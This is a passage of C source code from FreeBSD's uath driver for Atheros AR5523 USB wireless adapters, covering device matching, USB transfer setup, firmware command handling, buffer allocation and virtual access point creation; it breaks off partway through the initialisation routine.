OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /*- * Driver for Atheros AR5523 USB parts. * * The driver requires firmware to be loaded into the device. This * is done on device discovery from a user application (uathload) * that is launched by devd when a device with suitable product ID * is recognized. Once firmware has been loaded the device will * reset the USB port and re-attach with the original product ID+1 * and this driver will be attached. The firmware is licensed for * general use (royalty free) and may be incorporated in products. * Note that the firmware normally packaged with the NDIS drivers * for these devices does not work in this way and so does not work * with this driver. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #include #include #include #endif #include #include #include #include #include #include "usbdevs.h" #include #include static SYSCTL_NODE(_hw_usb, OID_AUTO, uath, CTLFLAG_RW, 0, "USB Atheros"); static int uath_countrycode = CTRY_DEFAULT; /* country code */ SYSCTL_INT(_hw_usb_uath, OID_AUTO, countrycode, CTLFLAG_RW | CTLFLAG_TUN, &uath_countrycode, 0, "country code"); TUNABLE_INT("hw.usb.uath.countrycode", &uath_countrycode); static int uath_regdomain = 0; /* regulatory domain */ SYSCTL_INT(_hw_usb_uath, OID_AUTO, regdomain, CTLFLAG_RD, &uath_regdomain, 0, "regulatory domain"); #ifdef UATH_DEBUG int uath_debug = 0; SYSCTL_INT(_hw_usb_uath, OID_AUTO, debug, CTLFLAG_RW | CTLFLAG_TUN, &uath_debug, 0, "uath debug level"); TUNABLE_INT("hw.usb.uath.debug", &uath_debug); enum { UATH_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ UATH_DEBUG_XMIT_DUMP = 0x00000002, /* xmit dump */ UATH_DEBUG_RECV = 0x00000004, /* basic recv operation */ UATH_DEBUG_TX_PROC = 0x00000008, /* tx ISR proc */ UATH_DEBUG_RX_PROC = 0x00000010, /* rx ISR proc */ UATH_DEBUG_RECV_ALL = 0x00000020, /* trace all frames (beacons) */ UATH_DEBUG_INIT = 0x00000040, /* initialization of dev */ UATH_DEBUG_DEVCAP = 0x00000080, /* dev caps */ UATH_DEBUG_CMDS = 0x00000100, /* commands */ UATH_DEBUG_CMDS_DUMP = 0x00000200, /* command buffer dump */ UATH_DEBUG_RESET = 0x00000400, /* reset processing */ UATH_DEBUG_STATE = 0x00000800, /* 802.11 state transitions */ UATH_DEBUG_MULTICAST = 0x00001000, /* multicast */ UATH_DEBUG_WME = 0x00002000, /* WME */ UATH_DEBUG_CHANNEL = 0x00004000, /* channel */ UATH_DEBUG_RATES = 0x00008000, /* rates */ UATH_DEBUG_CRYPTO = 0x00010000, /* crypto */ UATH_DEBUG_LED = 0x00020000, /* LED */ UATH_DEBUG_ANY = 0xffffffff }; #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->sc_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) do { \ (void) sc; \ } while (0) #endif /* unaligned little endian access */ #define LE_READ_2(p) \ ((u_int16_t) \ ((((u_int8_t *)(p))[0] ) | (((u_int8_t *)(p))[1] << 8))) #define LE_READ_4(p) \ ((u_int32_t) \ ((((u_int8_t *)(p))[0] ) | (((u_int8_t *)(p))[1] << 8) | \ (((u_int8_t *)(p))[2] << 16) | (((u_int8_t *)(p))[3] << 24))) /* recognized device vendors/products */ static const STRUCT_USB_HOST_ID uath_devs[] = { #define UATH_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } UATH_DEV(ACCTON, SMCWUSBTG2), UATH_DEV(ATHEROS, AR5523), UATH_DEV(ATHEROS2, AR5523_1), UATH_DEV(ATHEROS2, AR5523_2), UATH_DEV(ATHEROS2, AR5523_3), UATH_DEV(CONCEPTRONIC, AR5523_1), UATH_DEV(CONCEPTRONIC, AR5523_2), UATH_DEV(DLINK, DWLAG122), UATH_DEV(DLINK, DWLAG132), UATH_DEV(DLINK, DWLG132), UATH_DEV(DLINK2, DWA120), UATH_DEV(GIGASET, AR5523), UATH_DEV(GIGASET, SMCWUSBTG), UATH_DEV(GLOBALSUN, AR5523_1), UATH_DEV(GLOBALSUN, AR5523_2), UATH_DEV(NETGEAR, WG111U), UATH_DEV(NETGEAR3, WG111T), UATH_DEV(NETGEAR3, WPN111), UATH_DEV(NETGEAR3, WPN111_2), UATH_DEV(UMEDIA, TEW444UBEU), UATH_DEV(UMEDIA, AR5523_2), UATH_DEV(WISTRONNEWEB, AR5523_1), UATH_DEV(WISTRONNEWEB, AR5523_2), UATH_DEV(ZCOM, AR5523) #undef UATH_DEV }; static usb_callback_t uath_intr_rx_callback; static usb_callback_t uath_intr_tx_callback; static usb_callback_t uath_bulk_rx_callback; static usb_callback_t uath_bulk_tx_callback; static const struct usb_config uath_usbconfig[UATH_N_XFERS] = { [UATH_INTR_RX] = { .type = UE_BULK, .endpoint = 0x1, .direction = UE_DIR_IN, .bufsize = UATH_MAX_CMDSZ, .flags = { .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = uath_intr_rx_callback }, [UATH_INTR_TX] = { .type = UE_BULK, .endpoint = 0x1, .direction = UE_DIR_OUT, .bufsize = UATH_MAX_CMDSZ * UATH_CMD_LIST_COUNT, .flags = { .force_short_xfer = 1, .pipe_bof = 1, }, .callback = uath_intr_tx_callback, .timeout = UATH_CMD_TIMEOUT }, [UATH_BULK_RX] = { .type = UE_BULK, .endpoint = 0x2, .direction = UE_DIR_IN, .bufsize = MCLBYTES, .flags = { .ext_buffer = 1, .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = uath_bulk_rx_callback }, [UATH_BULK_TX] = { .type = UE_BULK, .endpoint = 0x2, .direction = UE_DIR_OUT, .bufsize = UATH_MAX_TXBUFSZ * UATH_TX_DATA_LIST_COUNT, .flags = { .force_short_xfer = 1, .pipe_bof = 1 }, .callback = uath_bulk_tx_callback, .timeout = UATH_DATA_TIMEOUT } }; static struct ieee80211vap *uath_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void uath_vap_delete(struct ieee80211vap *); static int uath_alloc_cmd_list(struct uath_softc *, struct uath_cmd []); static void uath_free_cmd_list(struct uath_softc *, struct uath_cmd []); static int uath_host_available(struct uath_softc *); static int uath_get_capability(struct uath_softc *, uint32_t, uint32_t *); static int uath_get_devcap(struct uath_softc *); static struct uath_cmd * uath_get_cmdbuf(struct uath_softc *); static int uath_cmd_read(struct uath_softc *, uint32_t, const void *, int, void *, int, int); static int uath_cmd_write(struct uath_softc *, uint32_t, const void *, int, int); static void uath_stat(void *); #ifdef UATH_DEBUG static void uath_dump_cmd(const uint8_t *, int, char); static const char * uath_codename(int); #endif static int uath_get_devstatus(struct uath_softc *, uint8_t macaddr[IEEE80211_ADDR_LEN]); static int uath_get_status(struct uath_softc *, uint32_t, void *, int); static int uath_alloc_rx_data_list(struct uath_softc *); static int uath_alloc_tx_data_list(struct uath_softc *); static void uath_free_rx_data_list(struct uath_softc *); static void uath_free_tx_data_list(struct uath_softc *); static int uath_init_locked(void *); static void uath_init(void *); static void uath_stop_locked(struct ifnet *); static void uath_stop(struct ifnet *); static int uath_ioctl(struct ifnet *, u_long, caddr_t); static void uath_start(struct ifnet *); static int uath_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void uath_scan_start(struct ieee80211com *); static void uath_scan_end(struct ieee80211com *); static void uath_set_channel(struct ieee80211com *); static void uath_update_mcast(struct ifnet *); static void uath_update_promisc(struct ifnet *); static int uath_config(struct uath_softc *, uint32_t, uint32_t); static int uath_config_multi(struct uath_softc *, uint32_t, const void *, int); static int uath_switch_channel(struct uath_softc *, struct ieee80211_channel *); static int uath_set_rxfilter(struct uath_softc *, uint32_t, uint32_t); static void uath_watchdog(void *); static void uath_abort_xfers(struct uath_softc *); static int uath_dataflush(struct uath_softc *); static int uath_cmdflush(struct uath_softc *); static int uath_flush(struct uath_softc *); static int uath_set_ledstate(struct uath_softc *, int); static int uath_set_chan(struct uath_softc *, struct ieee80211_channel *); static int uath_reset_tx_queues(struct uath_softc *); static int uath_wme_init(struct uath_softc *); static struct uath_data * uath_getbuf(struct uath_softc *); static int uath_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int uath_set_key(struct uath_softc *, const struct ieee80211_key *, int); static int uath_set_keys(struct uath_softc *, struct ieee80211vap *); static void uath_sysctl_node(struct uath_softc *); static int uath_match(device_t dev) { struct usb_attach_arg *uaa = device_get_ivars(dev); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != UATH_CONFIG_INDEX) return (ENXIO); if (uaa->info.bIfaceIndex != UATH_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(uath_devs, sizeof(uath_devs), uaa)); } static int uath_attach(device_t dev) { struct uath_softc *sc = device_get_softc(dev); struct usb_attach_arg *uaa = device_get_ivars(dev); struct ieee80211com *ic; struct ifnet *ifp; uint8_t bands, iface_index = UATH_IFACE_INDEX; /* XXX */ usb_error_t error; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; sc->sc_udev = uaa->device; #ifdef UATH_DEBUG sc->sc_debug = uath_debug; #endif device_set_usb_desc(dev); /* * Only post-firmware devices here. */ mtx_init(&sc->sc_mtx, device_get_nameunit(sc->sc_dev), MTX_NETWORK_LOCK, MTX_DEF); callout_init(&sc->stat_ch, 0); callout_init_mtx(&sc->watchdog_ch, &sc->sc_mtx, 0); error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, uath_usbconfig, UATH_N_XFERS, sc, &sc->sc_mtx); if (error) { device_printf(dev, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto fail; } sc->sc_cmd_dma_buf = usbd_xfer_get_frame_buffer(sc->sc_xfer[UATH_INTR_TX], 0); sc->sc_tx_dma_buf = usbd_xfer_get_frame_buffer(sc->sc_xfer[UATH_BULK_TX], 0); /* * Setup buffers for firmware commands. */ error = uath_alloc_cmd_list(sc, sc->sc_cmd); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Tx command list\n"); goto fail1; } /* * We're now ready to send+receive firmware commands. */ UATH_LOCK(sc); error = uath_host_available(sc); if (error != 0) { device_printf(sc->sc_dev, "could not initialize adapter\n"); goto fail3; } error = uath_get_devcap(sc); if (error != 0) { device_printf(sc->sc_dev, "could not get device capabilities\n"); goto fail3; } UATH_UNLOCK(sc); /* Create device sysctl node. */ uath_sysctl_node(sc); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not allocate ifnet\n"); error = ENXIO; goto fail2; } UATH_LOCK(sc); error = uath_get_devstatus(sc, macaddr); if (error != 0) { device_printf(sc->sc_dev, "could not get device status\n"); goto fail4; } /* * Allocate xfers for Rx/Tx data pipes. */ error = uath_alloc_rx_data_list(sc); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Rx data list\n"); goto fail4; } error = uath_alloc_tx_data_list(sc); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Tx data list\n"); goto fail4; } UATH_UNLOCK(sc); ifp->if_softc = sc; if_initname(ifp, "uath", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = uath_init; ifp->if_ioctl = uath_ioctl; ifp->if_start = uath_start; /* XXX UATH_TX_DATA_LIST_COUNT */ IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA | /* station mode */ IEEE80211_C_MONITOR | /* monitor mode supported */ IEEE80211_C_TXPMGT | /* tx power management */ IEEE80211_C_SHPREAMBLE | /* short preamble supported */ IEEE80211_C_SHSLOT | /* short slot time supported */ IEEE80211_C_WPA | /* 802.11i */ IEEE80211_C_BGSCAN | /* capable of bg scanning */ IEEE80211_C_TXFRAG; /* handle tx frags */ /* put a regulatory domain to reveal informations. */ uath_regdomain = sc->sc_devcap.regDomain; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if ((sc->sc_devcap.analog5GhzRevision & 0xf0) == 0x30) setbit(&bands, IEEE80211_MODE_11A); /* XXX turbo */ ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, macaddr); ic->ic_raw_xmit = uath_raw_xmit; ic->ic_scan_start = uath_scan_start; ic->ic_scan_end = uath_scan_end; ic->ic_set_channel = uath_set_channel; ic->ic_vap_create = uath_vap_create; ic->ic_vap_delete = uath_vap_delete; ic->ic_update_mcast = uath_update_mcast; ic->ic_update_promisc = uath_update_promisc; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), UATH_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), UATH_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); fail4: if_free(ifp); fail3: UATH_UNLOCK(sc); fail2: uath_free_cmd_list(sc, sc->sc_cmd); fail1: usbd_transfer_unsetup(sc->sc_xfer, UATH_N_XFERS); fail: return (error); } static int uath_detach(device_t dev) { struct uath_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; unsigned int x; /* * Prevent further allocations from RX/TX/CMD * data lists and ioctls */ UATH_LOCK(sc); sc->sc_flags |= UATH_FLAG_INVALID; STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); STAILQ_INIT(&sc->sc_cmd_active); STAILQ_INIT(&sc->sc_cmd_pending); STAILQ_INIT(&sc->sc_cmd_waiting); STAILQ_INIT(&sc->sc_cmd_inactive); UATH_UNLOCK(sc); uath_stop(ifp); callout_drain(&sc->stat_ch); callout_drain(&sc->watchdog_ch); /* drain USB transfers */ for (x = 0; x != UATH_N_XFERS; x++) usbd_transfer_drain(sc->sc_xfer[x]); /* free data buffers */ UATH_LOCK(sc); uath_free_rx_data_list(sc); uath_free_tx_data_list(sc); uath_free_cmd_list(sc, sc->sc_cmd); UATH_UNLOCK(sc); /* free USB transfers and some data buffers */ usbd_transfer_unsetup(sc->sc_xfer, UATH_N_XFERS); ieee80211_ifdetach(ic); if_free(ifp); mtx_destroy(&sc->sc_mtx); return (0); } static void uath_free_cmd_list(struct uath_softc *sc, struct uath_cmd cmds[]) { int i; for (i = 0; i != UATH_CMD_LIST_COUNT; i++) cmds[i].buf = NULL; } static int uath_alloc_cmd_list(struct uath_softc *sc, struct uath_cmd cmds[]) { int i; STAILQ_INIT(&sc->sc_cmd_active); STAILQ_INIT(&sc->sc_cmd_pending); STAILQ_INIT(&sc->sc_cmd_waiting); STAILQ_INIT(&sc->sc_cmd_inactive); for (i = 0; i != UATH_CMD_LIST_COUNT; i++) { struct uath_cmd *cmd = &cmds[i]; cmd->sc = sc; /* backpointer for callbacks */ cmd->msgid = i; cmd->buf = ((uint8_t *)sc->sc_cmd_dma_buf) + (i * UATH_MAX_CMDSZ); STAILQ_INSERT_TAIL(&sc->sc_cmd_inactive, cmd, next); UATH_STAT_INC(sc, st_cmd_inactive); } return (0); } static int uath_host_available(struct uath_softc *sc) { struct uath_cmd_host_available setup; UATH_ASSERT_LOCKED(sc); /* inform target the host is available */ setup.sw_ver_major = htobe32(ATH_SW_VER_MAJOR); setup.sw_ver_minor = htobe32(ATH_SW_VER_MINOR); setup.sw_ver_patch = htobe32(ATH_SW_VER_PATCH); setup.sw_ver_build = htobe32(ATH_SW_VER_BUILD); return uath_cmd_read(sc, WDCMSG_HOST_AVAILABLE, &setup, sizeof setup, NULL, 0, 0); } #ifdef UATH_DEBUG static void uath_dump_cmd(const uint8_t *buf, int len, char prefix) { const char *sep = ""; int i; for (i = 0; i < len; i++) { if ((i % 16) == 0) { printf("%s%c ", sep, prefix); sep = "\n"; } else if ((i % 4) == 0) printf(" "); printf("%02x", buf[i]); } printf("\n"); } static const char * uath_codename(int code) { #define N(a) (sizeof(a)/sizeof(a[0])) static const char *names[] = { "0x00", "HOST_AVAILABLE", "BIND", "TARGET_RESET", "TARGET_GET_CAPABILITY", "TARGET_SET_CONFIG", "TARGET_GET_STATUS", "TARGET_GET_STATS", "TARGET_START", "TARGET_STOP", "TARGET_ENABLE", "TARGET_DISABLE", "CREATE_CONNECTION", "UPDATE_CONNECT_ATTR", "DELETE_CONNECT", "SEND", "FLUSH", "STATS_UPDATE", "BMISS", "DEVICE_AVAIL", "SEND_COMPLETE", "DATA_AVAIL", "SET_PWR_MODE", "BMISS_ACK", "SET_LED_STEADY", "SET_LED_BLINK", "SETUP_BEACON_DESC", "BEACON_INIT", "RESET_KEY_CACHE", "RESET_KEY_CACHE_ENTRY", "SET_KEY_CACHE_ENTRY", "SET_DECOMP_MASK", "SET_REGULATORY_DOMAIN", "SET_LED_STATE", "WRITE_ASSOCID", "SET_STA_BEACON_TIMERS", "GET_TSF", "RESET_TSF", "SET_ADHOC_MODE", "SET_BASIC_RATE", "MIB_CONTROL", "GET_CHANNEL_DATA", "GET_CUR_RSSI", "SET_ANTENNA_SWITCH", "0x2c", "0x2d", "0x2e", "USE_SHORT_SLOT_TIME", "SET_POWER_MODE", "SETUP_PSPOLL_DESC", "SET_RX_MULTICAST_FILTER", "RX_FILTER", "PER_CALIBRATION", "RESET", "DISABLE", "PHY_DISABLE", "SET_TX_POWER_LIMIT", "SET_TX_QUEUE_PARAMS", "SETUP_TX_QUEUE", "RELEASE_TX_QUEUE", }; static char buf[8]; if (code < N(names)) return names[code]; if (code == WDCMSG_SET_DEFAULT_KEY) return "SET_DEFAULT_KEY"; snprintf(buf, sizeof(buf), "0x%02x", code); return buf; #undef N } #endif /* * Low-level function to send read or write commands to the firmware. */ static int uath_cmdsend(struct uath_softc *sc, uint32_t code, const void *idata, int ilen, void *odata, int olen, int flags) { struct uath_cmd_hdr *hdr; struct uath_cmd *cmd; int error; UATH_ASSERT_LOCKED(sc); /* grab a xfer */ cmd = uath_get_cmdbuf(sc); if (cmd == NULL) { device_printf(sc->sc_dev, "%s: empty inactive queue\n", __func__); return (ENOBUFS); } cmd->flags = flags; /* always bulk-out a multiple of 4 bytes */ cmd->buflen = roundup2(sizeof(struct uath_cmd_hdr) + ilen, 4); hdr = (struct uath_cmd_hdr *)cmd->buf; memset(hdr, 0, sizeof(struct uath_cmd_hdr)); hdr->len = htobe32(cmd->buflen); hdr->code = htobe32(code); hdr->msgid = cmd->msgid; /* don't care about endianness */ hdr->magic = htobe32((cmd->flags & UATH_CMD_FLAG_MAGIC) ? 1 << 24 : 0); memcpy((uint8_t *)(hdr + 1), idata, ilen); #ifdef UATH_DEBUG if (sc->sc_debug & UATH_DEBUG_CMDS) { printf("%s: send %s [flags 0x%x] olen %d\n", __func__, uath_codename(code), cmd->flags, olen); if (sc->sc_debug & UATH_DEBUG_CMDS_DUMP) uath_dump_cmd(cmd->buf, cmd->buflen, '+'); } #endif cmd->odata = odata; KASSERT(odata == NULL || olen < UATH_MAX_CMDSZ - sizeof(*hdr) + sizeof(uint32_t), ("odata %p olen %u", odata, olen)); cmd->olen = olen; STAILQ_INSERT_TAIL(&sc->sc_cmd_pending, cmd, next); UATH_STAT_INC(sc, st_cmd_pending); usbd_transfer_start(sc->sc_xfer[UATH_INTR_TX]); if (cmd->flags & UATH_CMD_FLAG_READ) { usbd_transfer_start(sc->sc_xfer[UATH_INTR_RX]); /* wait at most two seconds for command reply */ error = mtx_sleep(cmd, &sc->sc_mtx, 0, "uathcmd", 2 * hz); cmd->odata = NULL; /* in case reply comes too late */ if (error != 0) { device_printf(sc->sc_dev, "timeout waiting for reply " "to cmd 0x%x (%u)\n", code, code); } else if (cmd->olen != olen) { device_printf(sc->sc_dev, "unexpected reply data count " "to cmd 0x%x (%u), got %u, expected %u\n", code, code, cmd->olen, olen); error = EINVAL; } return (error); } return (0); } static int uath_cmd_read(struct uath_softc *sc, uint32_t code, const void *idata, int ilen, void *odata, int olen, int flags) { flags |= UATH_CMD_FLAG_READ; return uath_cmdsend(sc, code, idata, ilen, odata, olen, flags); } static int uath_cmd_write(struct uath_softc *sc, uint32_t code, const void *data, int len, int flags) { flags &= ~UATH_CMD_FLAG_READ; return uath_cmdsend(sc, code, data, len, NULL, 0, flags); } static struct uath_cmd * uath_get_cmdbuf(struct uath_softc *sc) { struct uath_cmd *uc; UATH_ASSERT_LOCKED(sc); uc = STAILQ_FIRST(&sc->sc_cmd_inactive); if (uc != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_cmd_inactive, next); UATH_STAT_DEC(sc, st_cmd_inactive); } else uc = NULL; if (uc == NULL) DPRINTF(sc, UATH_DEBUG_XMIT, "%s: %s\n", __func__, "out of command xmit buffers"); return (uc); } /* * This function is called periodically (every second) when associated to * query device statistics. */ static void uath_stat(void *arg) { struct uath_softc *sc = arg; int error; UATH_LOCK(sc); /* * Send request for statistics asynchronously. The timer will be * restarted when we'll get the stats notification. */ error = uath_cmd_write(sc, WDCMSG_TARGET_GET_STATS, NULL, 0, UATH_CMD_FLAG_ASYNC); if (error != 0) { device_printf(sc->sc_dev, "could not query stats, error %d\n", error); } UATH_UNLOCK(sc); } static int uath_get_capability(struct uath_softc *sc, uint32_t cap, uint32_t *val) { int error; cap = htobe32(cap); error = uath_cmd_read(sc, WDCMSG_TARGET_GET_CAPABILITY, &cap, sizeof cap, val, sizeof(uint32_t), UATH_CMD_FLAG_MAGIC); if (error != 0) { device_printf(sc->sc_dev, "could not read capability %u\n", be32toh(cap)); return (error); } *val = be32toh(*val); return (error); } static int uath_get_devcap(struct uath_softc *sc) { #define GETCAP(x, v) do { \ error = uath_get_capability(sc, x, &v); \ if (error != 0) \ return (error); \ DPRINTF(sc, UATH_DEBUG_DEVCAP, \ "%s: %s=0x%08x\n", __func__, #x, v); \ } while (0) struct uath_devcap *cap = &sc->sc_devcap; int error; /* collect device capabilities */ GETCAP(CAP_TARGET_VERSION, cap->targetVersion); GETCAP(CAP_TARGET_REVISION, cap->targetRevision); GETCAP(CAP_MAC_VERSION, cap->macVersion); GETCAP(CAP_MAC_REVISION, cap->macRevision); GETCAP(CAP_PHY_REVISION, cap->phyRevision); GETCAP(CAP_ANALOG_5GHz_REVISION, cap->analog5GhzRevision); GETCAP(CAP_ANALOG_2GHz_REVISION, cap->analog2GhzRevision); GETCAP(CAP_REG_DOMAIN, cap->regDomain); GETCAP(CAP_REG_CAP_BITS, cap->regCapBits); #if 0 /* NB: not supported in rev 1.5 */ GETCAP(CAP_COUNTRY_CODE, cap->countryCode); #endif GETCAP(CAP_WIRELESS_MODES, cap->wirelessModes); GETCAP(CAP_CHAN_SPREAD_SUPPORT, cap->chanSpreadSupport); GETCAP(CAP_COMPRESS_SUPPORT, cap->compressSupport); GETCAP(CAP_BURST_SUPPORT, cap->burstSupport); GETCAP(CAP_FAST_FRAMES_SUPPORT, cap->fastFramesSupport); GETCAP(CAP_CHAP_TUNING_SUPPORT, cap->chapTuningSupport); GETCAP(CAP_TURBOG_SUPPORT, cap->turboGSupport); GETCAP(CAP_TURBO_PRIME_SUPPORT, cap->turboPrimeSupport); GETCAP(CAP_DEVICE_TYPE, cap->deviceType); GETCAP(CAP_WME_SUPPORT, cap->wmeSupport); GETCAP(CAP_TOTAL_QUEUES, cap->numTxQueues); GETCAP(CAP_CONNECTION_ID_MAX, cap->connectionIdMax); GETCAP(CAP_LOW_5GHZ_CHAN, cap->low5GhzChan); GETCAP(CAP_HIGH_5GHZ_CHAN, cap->high5GhzChan); GETCAP(CAP_LOW_2GHZ_CHAN, cap->low2GhzChan); GETCAP(CAP_HIGH_2GHZ_CHAN, cap->high2GhzChan); GETCAP(CAP_TWICE_ANTENNAGAIN_5G, cap->twiceAntennaGain5G); GETCAP(CAP_TWICE_ANTENNAGAIN_2G, cap->twiceAntennaGain2G); GETCAP(CAP_CIPHER_AES_CCM, cap->supportCipherAES_CCM); GETCAP(CAP_CIPHER_TKIP, cap->supportCipherTKIP); GETCAP(CAP_MIC_TKIP, cap->supportMicTKIP); cap->supportCipherWEP = 1; /* NB: always available */ return (0); } static int uath_get_devstatus(struct uath_softc *sc, uint8_t macaddr[IEEE80211_ADDR_LEN]) { int error; /* retrieve MAC address */ error = uath_get_status(sc, ST_MAC_ADDR, macaddr, IEEE80211_ADDR_LEN); if (error != 0) { device_printf(sc->sc_dev, "could not read MAC address\n"); return (error); } error = uath_get_status(sc, ST_SERIAL_NUMBER, &sc->sc_serial[0], sizeof(sc->sc_serial)); if (error != 0) { device_printf(sc->sc_dev, "could not read device serial number\n"); return (error); } return (0); } static int uath_get_status(struct uath_softc *sc, uint32_t which, void *odata, int olen) { int error; which = htobe32(which); error = uath_cmd_read(sc, WDCMSG_TARGET_GET_STATUS, &which, sizeof(which), odata, olen, UATH_CMD_FLAG_MAGIC); if (error != 0) device_printf(sc->sc_dev, "could not read EEPROM offset 0x%02x\n", be32toh(which)); return (error); } static void uath_free_data_list(struct uath_softc *sc, struct uath_data data[], int ndata, int fillmbuf) { int i; for (i = 0; i < ndata; i++) { struct uath_data *dp = &data[i]; if (fillmbuf == 1) { if (dp->m != NULL) { m_freem(dp->m); dp->m = NULL; dp->buf = NULL; } } else { dp->buf = NULL; } if (dp->ni != NULL) { ieee80211_free_node(dp->ni); dp->ni = NULL; } } } static int uath_alloc_data_list(struct uath_softc *sc, struct uath_data data[], int ndata, int maxsz, void *dma_buf) { int i, error; for (i = 0; i < ndata; i++) { struct uath_data *dp = &data[i]; dp->sc = sc; if (dma_buf == NULL) { /* XXX check maxsz */ dp->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (dp->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } dp->buf = mtod(dp->m, uint8_t *); } else { dp->m = NULL; dp->buf = ((uint8_t *)dma_buf) + (i * maxsz); } dp->ni = NULL; } return (0); fail: uath_free_data_list(sc, data, ndata, 1 /* free mbufs */); return (error); } static int uath_alloc_rx_data_list(struct uath_softc *sc) { int error, i; /* XXX is it enough to store the RX packet with MCLBYTES bytes? */ error = uath_alloc_data_list(sc, sc->sc_rx, UATH_RX_DATA_LIST_COUNT, MCLBYTES, NULL /* setup mbufs */); if (error != 0) return (error); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); for (i = 0; i < UATH_RX_DATA_LIST_COUNT; i++) { STAILQ_INSERT_HEAD(&sc->sc_rx_inactive, &sc->sc_rx[i], next); UATH_STAT_INC(sc, st_rx_inactive); } return (0); } static int uath_alloc_tx_data_list(struct uath_softc *sc) { int error, i; error = uath_alloc_data_list(sc, sc->sc_tx, UATH_TX_DATA_LIST_COUNT, UATH_MAX_TXBUFSZ, sc->sc_tx_dma_buf); if (error != 0) return (error); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); for (i = 0; i < UATH_TX_DATA_LIST_COUNT; i++) { STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, &sc->sc_tx[i], next); UATH_STAT_INC(sc, st_tx_inactive); } return (0); } static void uath_free_rx_data_list(struct uath_softc *sc) { uath_free_data_list(sc, sc->sc_rx, UATH_RX_DATA_LIST_COUNT, 1 /* free mbufs */); } static void uath_free_tx_data_list(struct uath_softc *sc) { uath_free_data_list(sc, sc->sc_tx, UATH_TX_DATA_LIST_COUNT, 0 /* no mbufs */); } static struct ieee80211vap * uath_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct uath_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return (NULL); uvp = (struct uath_vap *) malloc(sizeof(struct uath_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return (NULL); vap = &uvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = uath_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return (vap); } static void uath_vap_delete(struct ieee80211vap *vap) { struct uath_vap *uvp = UATH_VAP(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static int uath_init_locked(void *arg) { struct uath_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t val; int error; UATH_ASSERT_LOCKED(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) uath_stop_locked(ifp); /* reset variables */ sc->sc_intrx_nextnum = sc->sc_msgid = 0; val = htobe32(0); uath_cmd_write(sc, WDCMSG_BIND, &val, sizeof val, 0); /* set MAC address */ uath_config_multi(sc, CFG_MAC_ADDR, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); /* XXX honor net80211 state */ uath_config(sc, 